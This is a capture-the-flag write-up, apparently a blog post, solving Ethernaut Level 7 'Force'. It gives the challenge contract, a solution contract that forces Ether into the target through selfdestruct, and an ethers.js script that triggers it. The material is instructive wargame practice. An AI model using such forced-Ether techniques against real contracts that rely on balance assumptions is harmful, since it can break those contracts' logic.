Cracking the Code: Ethernault (Level 7 - Force) CTF Challenge

Cracking the Code: Ethernault (Level 7 - Force) CTF Challenge

The Ethernaut is a Web3/Solidity-based wargame inspired by overthewire.org, played in theEthereum Virtual Machine. Each level is a smart contract that needs to be 'hacked'.

This challenge tests the player's knowledge about selfdestruct.

The challenge code

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Force {/*

                   MEOW ?
         /\_/\   /
    ____/ o o \
  /~____  =ø= /
 (______)__m_m)

*/}

The goal of this challenge is to make the balance of the contract greater than zero.

This contract does not contain any code; there is no receive or fallback function in the contract. This means the contract will not receive Ether if we try to send it. The only way to force send Ether to the challenge contract is to use selfdestruct.

Solution

//SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

contract Destruct {
    constructor() payable {}

    function destroy() public {
        address payable addr = (payable(address(0xB1762C3Ed308e9408AFBE137169A48Fc2fd3d117)));
        selfdestruct(addr);
    }
}
const { ethers } = require("ethers");
const abi = require("../artifacts/contracts/Destruct.sol/Destruct.json");

const provider = ethers.getDefaultProvider(process.env.SEPO_API_KEY_URL);

const signer = new ethers.Wallet(process.env.SEPO_PRIVATE_KEY, provider);

(async () => {
  const contract = new ethers.Contract(
    "0x4596ABC9B700A07C4AECD4CE97741A8467e0961c",
    abi.abi,
    signer
  );

  const ctx = await contract.destroy();
  await ctx.wait();
})();

The solution contract

We create a Destruct contract with a payable constructor. This allows us to send Ether into the contract during deployment. Next, we create a 'destroy' function, inside this function, we wrap the challenge address around a payable and call it inside the selfdestruct. The reason for sending Ether to the solution contract is to ensure that, at the point of destroying this contract, we can force Ether in this contract to move into the challenge contract.

The solution script

Firstly, we set up the ABI, provider, and signer. The ABI allows interaction with our solution contract, the provider facilitates interaction with the blockchain, and the signer is how the user interacts with the contract.

The next step is to call the destroy function in the solution contract.

Conclusion

Thank you for reading; I hope you have gained valuable insights from this explanation.